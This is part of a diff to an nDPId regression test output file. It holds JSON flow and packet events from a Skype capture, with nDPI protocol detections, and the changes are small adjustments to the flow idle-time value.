-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1010,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50067,"dst_port":40027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1010,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1431969681480,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969681480,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/b9AAEAGpVbAqAEinTc4oMOTnFuhu64eAAAAALAC\/\/+OBAAAAgQFtAEDAwUBAQgKPiMjagAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1001,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681060,"flow_last_seen":1431969681060,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969681060,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1001,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1431969681060,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969681060,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2fpAAEAGfq\/AqAEiQTffDMOSAbvQogCqAAAAALAC\/\/9eaAAAAgQFtAEDAwUBAQgKPiMhyQAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1003,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":2,"flow_last_seen":1431969681195,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969681195,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYa5BN98MwKgBIgG7w5Js9UEp0KIAq6ASOJBL6AAAAgQFrAQCCApNoe8nPiMhyQEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1004,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":3,"flow_last_seen":1431969681195,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969681195,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ayJAAEAG7ZPAqAEiQTffDMOSAbvQogCrbPVBKoAQECyijAAAAQEICj4jIk9Noe8n"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1010,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50067,"dst_port":40027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1010,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1431969681480,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969681480,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/b9AAEAGpVbAqAEinTc4oMOTnFuhu64eAAAAALAC\/\/+OBAAAAgQFtAEDAwUBAQgKPiMjagAAAAAEAgAA"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1011,"source":"skype.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.162","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1011,"source":"skype.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1431969681480,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969681480,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4YcMAAEARzb3AqAEi1cezojLdnF0AJAuMnGgC2mPP3NT+NgZcfouOKEVgI\/tI0sJfUuMhDA=="} 00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1011,"source":"skype.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.162","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -589,26 +589,26 @@ 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1013,"source":"skype.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.159","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1013,"source":"skype.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1431969681480,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969681480,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyaGwAAEARx63AqAEinTfrnzLdnFUAHmVKnGwCxXHmKlMo0hJpMwmU59yIG9tJmA=="} 00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1013,"source":"skype.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.159","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":2,"flow_last_seen":1431969681627,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969681627,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsBqdNzigwKgBIpxbw5OkoMOPobuuH6ASOJAefQAAAgQFrAQCCApNfpJAPiMjagEDAwk="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":3,"flow_last_seen":1431969681627,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969681627,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0mLVAAEAGCm3AqAEinTc4oMOTnFuhu64fpKDDkIAQECx1FQAAAQEICj4jI\/xNfpJA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":2,"flow_last_seen":1431969681627,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969681627,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsBqdNzigwKgBIpxbw5OkoMOPobuuH6ASOJAefQAAAgQFrAQCCApNfpJAPiMjagEDAwk="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":3,"flow_last_seen":1431969681627,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969681627,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0mLVAAEAGCm3AqAEinTc4oMOTnFuhu64fpKDDkIAQECx1FQAAAQEICj4jI\/xNfpJA"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1030,"source":"skype.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969682488,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"skype.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1431969682488,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969682488,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4pYYAAEARPZvAqAEinTc4kjLdgQkAJLU7nG4Cyw+0E3ewR9IGP0eBLCPkEu6cvusCSULx8g=="} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1030,"source":"skype.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969682488,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1031,"source":"skype.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969682488,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"skype.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1431969682488,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969682488,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2L4AAEARJivAqAEib91KHDLdnE4ALJRcnHACG8tsqKlSc3O3hWaMTNmN0BY4DMi8SBQzDHozUa6r8phn"} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1031,"source":"skype.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969682488,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1039,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683081,"flow_last_seen":1431969683081,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969683081,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1039,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1431969683081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969683081,"pkt":"0NQSxnP1PBXCt3IOCABFAABAOCFAAEAGavXAqAEinTc4oMOVAbs\/vddwAAAAALAC\/\/9bFwAAAgQFtAEDAwUBAQgKPiMpogAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1042,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":2,"flow_last_seen":1431969683227,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969683227,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsBqdNzigwKgBIgG7w5UO87UwP73XcaASOJCODAAAAgQFrAQCCApNfpPQPiMpogEDAwk="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1043,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":3,"flow_last_seen":1431969683227,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969683227,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0+rpAAEAGqGfAqAEinTc4oMOVAbs\/vddxDvO1MYAQECzkpQAAAQEICj4jKjNNfpPQ"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1039,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683081,"flow_last_seen":1431969683081,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969683081,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1039,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1431969683081,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969683081,"pkt":"0NQSxnP1PBXCt3IOCABFAABAOCFAAEAGavXAqAEinTc4oMOVAbs\/vddwAAAAALAC\/\/9bFwAAAgQFtAEDAwUBAQgKPiMpogAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1042,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":2,"flow_last_seen":1431969683227,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969683227,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsBqdNzigwKgBIgG7w5UO87UwP73XcaASOJCODAAAAgQFrAQCCApNfpPQPiMpogEDAwk="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1043,"source":"skype.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":3,"flow_last_seen":1431969683227,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969683227,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0+rpAAEAGqGfAqAEinTc4oMOVAbs\/vddxDvO1MYAQECzkpQAAAQEICj4jKjNNfpPQ"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1048,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683445,"flow_last_seen":1431969683445,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969683445,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54343,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1048,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1431969683445,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969683445,"pkt":"0NQSxnP1PBXCt3IOCABFAABLY\/4AAEARkzDAqAEiwKgBAdRHADUAN3UY\/nwBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDEzAXIFc2t5cGUDbmV0AAABAAE="} 00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1048,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683445,"flow_last_seen":1431969683445,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969683445,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54343,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst13.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1049,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683445,"flow_last_seen":1431969683445,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969683445,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58368,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1049,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1431969683445,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969683445,"pkt":"0NQSxnP1PBXCt3IOCABFAABLbZEAAEARiZ3AqAEiwKgBAeQAADUAN6zvm+wBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDEzAXIFc2t5cGUDbmV0AAAcAAE="} 00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1049,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683445,"flow_last_seen":1431969683445,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969683445,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58368,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst13.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1050,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50070,"dst_port":40018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1050,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1431969683498,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969683498,"pkt":"0NQSxnP1PBXCt3IOCABFAABAjFBAAEAGzLvAqAEinTeCqsOWnFJsNFWpAAAAALAC\/\/\/KJgAAAgQFtAEDAwUBAQgKPiMrQAAAAAAEAgAA"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1050,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50070,"dst_port":40018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1050,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1431969683498,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969683498,"pkt":"0NQSxnP1PBXCt3IOCABFAABAjFBAAEAGzLvAqAEinTeCqsOWnFJsNFWpAAAAALAC\/\/\/KJgAAAgQFtAEDAwUBAQgKPiMrQAAAAAAEAgAA"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1051,"source":"skype.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1051,"source":"skype.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1431969683498,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969683498,"pkt":"0NQSxnP1PBXCt3IOCABFAAAygKMAAEARGILAqAEinTeClDLdnFMAHuO+nHICw5e0uFvnoh7r2z7q0Ash9G6vuA=="} 00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1051,"source":"skype.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -618,8 +618,8 @@ 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1053,"source":"skype.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 